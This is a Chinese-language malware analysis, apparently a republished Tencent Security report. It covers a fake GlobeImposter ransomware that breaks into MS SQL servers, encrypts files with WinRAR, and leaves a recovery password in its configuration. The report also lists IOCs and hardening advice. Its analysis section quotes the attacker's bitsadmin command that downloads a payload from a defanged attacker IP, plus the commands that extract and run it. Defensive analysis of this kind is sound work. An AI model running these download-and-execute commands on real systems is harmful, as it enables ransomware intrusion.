内容简介:近日,腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播,攻击者疑通过MS SQL爆破入侵服务器,通过网络下载恶意脚本代码,继而执行加密和勒索流程。令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中,使用这个密码解压缩,文件就能完全恢复。分析
近日,腾讯安全御见威胁情报中心发现假冒GlobeImposter勒索病毒正在传播,攻击者疑通过MS SQL爆破入侵服务器,通过网络下载恶意脚本代码,继而执行加密和勒索流程。
令人惊叹的是,这个所谓的“勒索病毒”执行极为简单,只是利用WinRAR加密压缩用户文件,之后再将一封GlobeImposter的勒索消息邮件修改后恐吓用户,通过邮箱联系索取酬金。腾讯安全提醒大家,如遇到此病毒,不要着急着缴纳赎金。该病毒加密压缩的密码明文写在病毒配置信息中,使用这个密码解压缩,文件就能完全恢复。
分析
被勒索服务器疑似被通过MSSQL爆破入侵成功,之后执行以下相关命令行进一步下载执行恶意代码:
1 )bitsadmin /transfer n hxxp://47.92.55[.]239/s/jr26.rar C:/Progra~1/jr26.rar
2 )C:\Windows\system32\cmd.exe /c C:\Progra~1\winrar\rar.exe e -pp.5p C:\Progra~1\jr26.rar
3 )C:\Windows\system32\cmd.exe /c C:\Progra~1\jr26.cmd
jr26.rar 为一个带密码的压缩包,密码为p.5p
jr26.rar 解压后可得到一个疑似乱码的脚本文件
16 进制查看可发现貌似多了0xFF 0xFE 0x0D 0x0A,目测应该是以二进制形式写入的标志,导致文本类识别 工具 无法查看
去掉0xFF 0xFE 0x0D 0x0A后尝试再次打开,脚本内容已可以正常查看
查看脚本内容可知,主要目的为将指定类型的文件根据后缀分类,分别使用winrar进行加密压缩(通过上图的命令行参数,我们看到加密密码为 lll.hc3t6b9s8kz5r26 ),文件将被压缩至根目录下对应的不同文件名(邮箱.ch_文件后缀类型.随机数字tiger88818)包内,同时删除原始文件。
如下图[email protected]_bax.32419tiger88818包内,则被带密码压缩了所有bak类型的文件
同时,为了防止加密压缩时,数据库文件被占用导致加密中止,病毒还会结束大量的数据库服务相关进程。
最奇葩的来了,加密文件完成后,病毒会通过远程下载一个勒索说明文档
打开说明文档,竟然是知名勒索病毒GlobeImposter的修改版本,该病毒作者只是修改了联系邮箱。
进一步观察病毒使用的url可发现攻击者使用的多个文件,分别有勒索说明文档(HOW_TO_BACK_YOUR_FILE*),勒索脚本包(jr26.rar),正规的winrar压缩模块(Rar.exe),猜测为扫描器相关模块包(带未知密码的s.rar包),且病毒使用服务部署在某知名云平台服务器上。
腾讯安全提醒大家,针对此病毒,可以不必着急缴纳赎金,可尝试使用Winrar打开根目录中的*tiger88818后缀文件,然后选择使用密码(lll.hc3t6b9s8kz5r26)解压到指定位置,即可恢复文件。
安全建议
企业用户:
1 、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆;
2 、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问;
3 、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理;
4 、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器;
5 、对重要文件和数据(数据库等数据)进行定期非本地备份;
6 、教育终端用户谨慎下载陌生邮件附件,若非必要,应禁止启用Office宏代码;
7 、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务;
8 、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。
个人用户:
1 、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码;
2 、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。
IOCs
MD5:
36e826b4a06dcbf039fb8fd6aeca4836
e9613db5620dbcb56903b98532971582
f18b3b2dc6556d60663d70ac411c0ac8
hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt
hxxp://47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar
hxxp://47.92.55.239/s/jr26.rar
hxxp://47.92.55.239/s/Rar.exe
hxxp://47.92.55.239/s/s.rar
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- 勒索病毒冒充《王者荣耀》外挂敲诈20元 黑客被找到
- 分析CVE-2018-8581:如何在MicrosoftExchange上冒充用户
- 马斯克哭了!又有黑客冒充他诈骗比特币
- 分析CVE-2018-8581:在Microsoft Exchange上冒充用户
- 澳洲程序员谈 996;GitHub 公开 B 站寄来的 DMCA 删除通知;新 Edge 会冒充其它浏览器丨 Q 新闻
- 瞄准大型组织进行勒索:详细分析BitPaymer勒索软件
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Rework
Jason Fried、David Heinemeier Hansson / Crown Business / 2010-3-9 / USD 22.00
"Jason Fried and David Hansson follow their own advice in REWORK, laying bare the surprising philosophies at the core of 37signals' success and inspiring us to put them into practice. There's no jarg......一起来看看 《Rework》 这本书的介绍吧!
